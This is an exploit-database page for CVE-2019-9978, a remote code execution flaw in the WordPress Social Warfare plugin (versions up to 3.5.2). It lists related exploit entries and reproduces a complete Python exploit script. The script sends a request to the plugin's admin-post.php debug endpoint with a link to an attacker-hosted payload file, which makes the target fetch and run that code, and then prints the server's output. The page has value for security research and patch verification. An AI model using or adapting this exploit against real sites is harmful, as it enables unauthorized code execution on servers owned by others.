Wordpress Social Warfare Remote Code Execution

🗓️ 03 May 2019 00:00:00Reported by Luka SikicType

packetstorm🔗 packetstormsecurity.com👁 72 Views

RCE in Social Warfare Plugin Wordpress ( <=3.5.2 ), March 2019, CVE-2019-9978 Luka Sikic, hash3liZe

Reporter	Title	Published	Views	Family All 40
0day.today	Wordpress Social Warfare Plugin 3.5.3 - Remote Code Execution Exploit	3 May 201900:00	–	zdt
0day.today	WordPress Social Warfare 3.5.2 Remote Code Execution Exploit	27 Jul 202100:00	–	zdt
GithubExploit	Vuln_Exploitation_MegaQuagga_Pentest	30 Apr 202600:52	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	3 May 201905:57	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	25 Mar 201923:38	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	1 Jan 202608:02	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	27 Mar 202523:18	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	25 Jan 202619:32	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Warfareplugins Social_Warfare	20 Jan 202316:29	–	githubexploit
ATTACKERKB	CVE-2019-9978	24 Mar 201900:00	–	attackerkb

`# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )  
# Date: March, 2019  
# Researcher: Luka Sikic  
# Exploit Author: hash3liZer  
# Download Link: https://wordpress.org/plugins/social-warfare/  
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM  
# Github: https://github.com/hash3liZer/CVE-2019-9978  
# Version: <=3D 3.5.2  
# CVE: CVE-2019-9978  
  
# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 )  
# Date: March, 2019  
# Researcher: Luka Sikic  
# Exploit Author: hash3liZer  
# Download Link: https://wordpress.org/plugins/social-warfare/  
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM  
# Github: https://github.com/hash3liZer/CVE-2019-9978  
# Version: <= 3.5.2  
# CVE: CVE-2019-9978  
  
import sys  
import requests  
import re  
import urlparse  
import optparse  
  
class EXPLOIT:  
  
VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"  
  
def __init__(self, _t, _p):  
self.target = _t  
self.payload = _p  
  
def engage(self):  
uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )  
r = requests.get( uri )  
if r.status_code == 500:  
print "[*] Received Response From Server!"  
rr = r.text  
obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))  
if obj:  
resp = obj.groups()[0]  
if resp:  
print "[<] Received: "  
print resp.replace( "lnbreak", "\n" )  
else:  
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")  
else:  
sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")  
else:  
sys.exit( "[~] Unexpected Status Received!" )  
  
def main():  
parser = optparse.OptionParser( )  
  
parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )  
parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )  
  
(options, args) = parser.parse_args()  
  
print "[>] Sending Payload to System!"  
exploit = EXPLOIT( options.target, options.payload )  
exploit.engage()  
  
if __name__ == "__main__":  
main()  
`

03 May 2019 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.88711